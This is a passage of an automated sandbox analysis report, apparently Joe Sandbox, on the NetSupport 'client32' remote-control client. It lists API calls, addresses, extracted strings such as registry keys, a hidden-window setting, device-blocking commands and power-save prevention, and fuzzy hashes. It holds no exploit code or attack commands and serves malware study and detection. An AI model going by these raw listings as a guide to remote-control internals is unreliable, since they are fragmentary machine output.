                                                                              • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                              • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                              • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                              • GetDC.USER32(?), ref: 11025085
                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                              • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                              • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                              • SelectObject.GDI32(?,?), ref: 110250C7
                                                                              • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SetCaretPos.USER32(?,?), ref: 11025111
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                              • String ID:
                                                                              • API String ID: 4100900918-3916222277
                                                                              • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                              • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,00000002,00000000,?), ref: 110F618F
                                                                              • GetCurrentProcessId.KERNEL32 ref: 110F61D1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F6203
                                                                              • GetCurrentProcessId.KERNEL32 ref: 110F620C
                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
                                                                              • GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
                                                                              • CloseHandle.KERNEL32(11189C68), ref: 110F626A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110F6271
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F627B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProc
                                                                              • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                              • API String ID: 219584714-2825297712
                                                                              • Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                              • Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
                                                                              • Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                              • Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101F0FE
                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                              • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                              • _memset.LIBCMT ref: 1101F1CF
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                              • __strdup.LIBCMT ref: 1101F221
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                              • String ID: 0$MakeOwnerDraw
                                                                              • API String ID: 1249465458-1190305232
                                                                              • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                              • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • Sleep.KERNEL32(000005DC,?,_License,Product,0000000A,00000000), ref: 110420FB
                                                                                • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep__itow__wcstoi64
                                                                              • String ID: **** Reset expire flag$Client$DisableAudio$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DoNewLic received (VistaUI=%d)$Expired$IsFree %d, was free %d$Product$Reset JoinClass, ReplayMenu, RequestHelp, Journal and Audio, ts=%d, vui=%d, config %x$_License
                                                                              • API String ID: 4129630603-1903392697
                                                                              • Opcode ID: d46471da32b8e076ae62e4517dea457e2a850050897a959a9ec011138dfc9d33
                                                                              • Instruction ID: f1bcba3b4901feba08b80abf289acb79b6efd6a89dcbef1bb648f8c495c40a7b
                                                                              • Opcode Fuzzy Hash: d46471da32b8e076ae62e4517dea457e2a850050897a959a9ec011138dfc9d33
                                                                              • Instruction Fuzzy Hash: 2251497CB421267BE251C692ECA1FAAFB59AF40708F508494F91D3B6C5DB217A00C3E6
                                                                              APIs
                                                                              • ReleaseDC.USER32(?,?), ref: 110082C5
                                                                              • _free.LIBCMT ref: 110083F3
                                                                              • SelectObject.GDI32(?,?), ref: 11008415
                                                                              • DeleteDC.GDI32(?), ref: 11008422
                                                                              • DeleteObject.GDI32(?), ref: 1100842F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDC.USER32(00000000), ref: 1100845D
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1100846A
                                                                              • CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
                                                                              • SelectObject.GDI32(?,00000000), ref: 11008495
                                                                              • _malloc.LIBCMT ref: 110084F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$CompatibleCreateDeleteSelect$BitmapErrorExitLastMessageProcessRelease_free_mallocwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2152670842-2830328467
                                                                              • Opcode ID: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
                                                                              • Instruction ID: 3850b8ccd8beb0e98ab4cbe1f7b01c035796fd6338f527faacd148ed971815aa
                                                                              • Opcode Fuzzy Hash: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
                                                                              • Instruction Fuzzy Hash: D0B1F7B5A00B019FD364CF29C984AD7B7E5FB88359F10892EE5AE97351DB30B941CB50
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                              • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastShowWindow
                                                                              • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                              • API String ID: 3252650109-4091810678
                                                                              • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                              • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                              • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 2188719708-2019804778
                                                                              • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                              • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                              • wsprintfA.USER32 ref: 1103F5D1
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                              • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                              • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1300213680-78349004
                                                                              • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                              • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111060BD
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 111060C6
                                                                              • GetTickCount.KERNEL32 ref: 111060CC
                                                                              • GetTickCount.KERNEL32 ref: 111060FE
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106107
                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106128
                                                                              • WriteFile.KERNEL32(00000000,1118D473,?,?,00000000,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF), ref: 11106140
                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 1110614D
                                                                              • GetTickCount.KERNEL32 ref: 1110615C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106165
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 831250470-625438208
                                                                              • Opcode ID: b9d1af00e1bf6dd2141f06b6bc4c907b37dd27444a28205debb36fb9e20f67e7
                                                                              • Instruction ID: 13f5c4759399fea5f197c2842d94d2023bcd330517dc4026a62a2474a30daa22
                                                                              • Opcode Fuzzy Hash: b9d1af00e1bf6dd2141f06b6bc4c907b37dd27444a28205debb36fb9e20f67e7
                                                                              • Instruction Fuzzy Hash: 08210B79A40228AFDB009FB5DD88DAAFBA8EB863197140576FC19D7605D631DC44CBE0
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1105F251
                                                                              • wsprintfA.USER32 ref: 1105F265
                                                                                • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75BF8400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                              • wsprintfA.USER32 ref: 1105F5D6
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                              • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 273891520-33395967
                                                                              • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                              • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: wsprintf
                                                                              • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                              • API String ID: 2111968516-2092292787
                                                                              • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                              • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 1101653C
                                                                              • IsWindowVisible.USER32(?), ref: 11016549
                                                                              • GetWindow.USER32(?,00000004), ref: 11016556
                                                                              • IsWindowVisible.USER32(00000000), ref: 11016561
                                                                              • GetClassNameA.USER32(?,?,00000020), ref: 11016576
                                                                              • SendMessageTimeoutA.USER32(?,0000000D,000000C8,?,00000002,00000064,?), ref: 110165DF
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11016604
                                                                              • DeleteObject.GDI32(00000000), ref: 1101665F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: Window$Visible$ClassDeleteMessageNameObjectProcessRectSendThreadTimeout
                                                                              • String ID: NSMWControl32$NSSWControl32$Progman
                                                                              • API String ID: 3572104470-975155618
                                                                              • Opcode ID: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
                                                                              • Instruction ID: e961a916bbbcfe8b57c7ffd2e482cea40bc41dda2ab4819b6da64e7ff7338971
                                                                              • Opcode Fuzzy Hash: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
                                                                              • Instruction Fuzzy Hash: AE514175D102299FDB54DF64CC84BEDB7B4BF49304F0041A9E519E7284EB74AA84CF90
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111EE708,AB86ACF8,1110FB6D,00000000,00000000,00000000,E8111B71,111834F3,000000FF,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000), ref: 110762FE
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 11076367
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 1107636D
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 11076377
                                                                              • InitializeCriticalSection.KERNEL32(000004D0,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 110763CC
                                                                              • InitializeCriticalSection.KERNEL32(000004F8,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 110763D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: CriticalInitializeSection$CreateEvent__wcstoi64
                                                                              • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                              • API String ID: 4263422321-2298398812
                                                                              • Opcode ID: 3bfa92a817ece274302d250373404b209347b29eec5472e03355f07c417707ac
                                                                              • Instruction ID: 06ccc5540fe39e817025fd6f1a9fd6d6e0fa44080d25a9a2500616ed5f0e287a
                                                                              • Opcode Fuzzy Hash: 3bfa92a817ece274302d250373404b209347b29eec5472e03355f07c417707ac
                                                                              • Instruction Fuzzy Hash: F651DF75A002859FDB11CF65CC84B9ABBE8FF84304F0485BAED599F245DB71A904CBA0
                                                                              APIs
                                                                              Strings
                                                                              • SETOPTICALDRIVEACCESS, xrefs: 1103E2A4
                                                                              • BLOCKPRINTING, xrefs: 1103E2CD
                                                                              • SETUSBMASSSTORAGEACCESS, xrefs: 1103E273
                                                                              • IsA(), xrefs: 1103E314
                                                                              • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103E296
                                                                              • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103E2F2
                                                                              • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103E2EB
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103E30F
                                                                              • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103E2BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: _malloc_memmove
                                                                              • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 1183979061-1830555902
                                                                              • Opcode ID: 9b34990abfa7304c75fe016d07a1042945b08913bde49073393358d21a8343bb
                                                                              • Instruction ID: 2acc51cda120abcbc41a40362124fa069fa22fd40148d7782b96d72c19966105
                                                                              • Opcode Fuzzy Hash: 9b34990abfa7304c75fe016d07a1042945b08913bde49073393358d21a8343bb
                                                                              • Instruction Fuzzy Hash: 8041B67590022A9FCB01CFA5CC90FEEB7B8EF85349F144669E815A7640EA35F904CBA1
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8), ref: 11104203
                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 11104247
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 11104284
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetLastError.KERNEL32(00000078), ref: 1110425B
                                                                              Strings
                                                                              • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 111042A1
                                                                              • Kernel32.dll, xrefs: 111041F8
                                                                              • *DisablePreventPowerSave, xrefs: 11104146
                                                                              • SetThreadExecutionState, xrefs: 1110423E
                                                                              • *DisableHighPerfPower, xrefs: 1110417A
                                                                              • Client, xrefs: 1110414B, 1110417F
                                                                              • Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x, xrefs: 11104272
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                              • String ID: *DisableHighPerfPower$*DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x$SetThreadExecutionState
                                                                              • API String ID: 338032539-196928431
                                                                              • Opcode ID: 9c57c70fdc21affc2296716391b8b67586f8e8409b6c3f0d4ea8d6a206138ae3
                                                                              • Instruction ID: 2e060bf9626fb0c35ad8c6db44363252f10ecc5b1c43e62de7a8a10b1031c62f
                                                                              • Opcode Fuzzy Hash: 9c57c70fdc21affc2296716391b8b67586f8e8409b6c3f0d4ea8d6a206138ae3
                                                                              • Instruction Fuzzy Hash: D641A4B9E41269AFEB00DF96DAD0AADFBF8FB45358F11453EE819A3604D7301844CB51
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 111465AC
                                                                              • PlaySoundA.WINMM(00000000,?,11042985), ref: 11146698
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              • wsprintfA.USER32 ref: 11146603
                                                                              • _memset.LIBCMT ref: 11146610
